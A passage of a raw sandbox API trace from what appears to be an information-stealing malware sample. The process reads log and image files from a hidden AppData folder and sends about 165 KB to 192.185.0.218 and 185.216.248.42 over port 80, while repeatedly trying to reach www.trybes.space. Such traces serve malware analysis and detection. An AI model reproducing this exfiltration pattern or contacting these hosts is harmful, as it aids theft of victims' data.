HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0286.271] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0286.271] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.271] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0x1b78, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0286.271] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0286.271] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0286.271] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa60, FileInformation=0x10b3fa70, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa60, FileInformation=0x10b3fa70) returned 0x0 [0286.271] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa60, Buffer=0x103e984d, BufferLength=0x16987, ByteOffset=0x10b3fa58*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa60, Buffer=0x103e984d*) returned 0x0 [0286.272] NtClose (Handle=0x1b78) returned 0x0 [0286.272] socket (af=2, type=1, protocol=6) returned 0x1b78 [0286.272] connect (s=0x1b78, name=0x88841c0*(sa_family=2, sin_port=0x50, sin_addr="192.185.0.218"), namelen=16) returned 0 [0286.418] RtlIntegerToChar (in: Value=0x282fd, Base=0x0, Length=0x8, String=0x10b3fab8 | out: String="164605") returned 0x0 [0286.419] send (s=0x1b78, buf=0x10469840*, len=165034, flags=0) returned 165034 [0286.422] closesocket (s=0x1b78) returned 0 [0286.422] getaddrinfo (in: pNodeName="www.trybes.space", pServiceName="80", pHints=0x8791458*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8791488 | out: ppResult=0x8791488*=0x0) returned 11002 [0288.411] Sleep (dwMilliseconds=0x7d0) [0288.413] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.413] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0288.413] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0288.413] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b610) returned 1 [0288.413] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.413] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0288.413] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0288.413] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b970) returned 1 [0288.413] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0288.413] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x28, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0288.413] NtClose (Handle=0x1b78) returned 0x0 [0288.413] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.413] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0288.414] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0288.414] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0288.414] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.414] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0288.414] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0288.414] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0288.414] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.414] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0288.414] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0288.414] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b970) returned 1 [0288.414] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.414] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0288.414] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0288.414] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892ada0) returned 1 [0288.414] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0288.414] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x6fe, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0288.414] NtClose (Handle=0x1b78) returned 0x0 [0288.414] getaddrinfo (in: pNodeName="www.trybes.space", pServiceName="80", pHints=0x8791458*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8791488 | out: ppResult=0x8791488*=0x0) returned 11002 [0288.417] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.417] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0288.418] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0288.418] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0288.418] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.418] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0288.418] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0288.418] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b970) returned 1 [0288.418] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0288.418] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x28, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0288.418] NtClose (Handle=0x1b78) returned 0x0 [0288.418] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.418] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0288.419] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0288.419] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0288.419] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.419] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0288.419] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0288.419] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b610) returned 1 [0288.419] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.419] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0x1b78, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0288.419] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0288.419] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0288.419] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa60, FileInformation=0x10b3fa70, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa60, FileInformation=0x10b3fa70) returned 0x0 [0288.419] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa60, Buffer=0x103e984d, BufferLength=0x16987, ByteOffset=0x10b3fa58*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa60, Buffer=0x103e984d*) returned 0x0 [0288.419] NtClose (Handle=0x1b78) returned 0x0 [0288.420] getaddrinfo (in: pNodeName="www.trybes.space", pServiceName="80", pHints=0x8791458*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8791488 | out: ppResult=0x8791488*=0x0) returned 11002 [0288.424] socket (af=2, type=1, protocol=6) returned 0x1b78 [0288.424] connect (s=0x1b78, name=0x88843a0*(sa_family=2, sin_port=0x50, sin_addr="185.216.248.42"), namelen=16) returned 0 [0288.687] send (s=0x1b78, buf=0xa10808a*, len=158, flags=0) returned 158 [0288.687] setsockopt (s=0x1b78, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0288.687] recv (in: s=0x1b78, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 485 [0288.968] closesocket (s=0x1b78) returned 0 [0288.968] Sleep (dwMilliseconds=0x7d0) [0288.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.970] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0288.970] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0288.970] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b610) returned 1 [0288.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.970] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0288.971] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0288.971] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0288.971] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0288.971] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x28, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0288.971] NtClose (Handle=0x1b78) returned 0x0 [0288.971] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.971] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0288.971] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0288.971] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0288.971] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 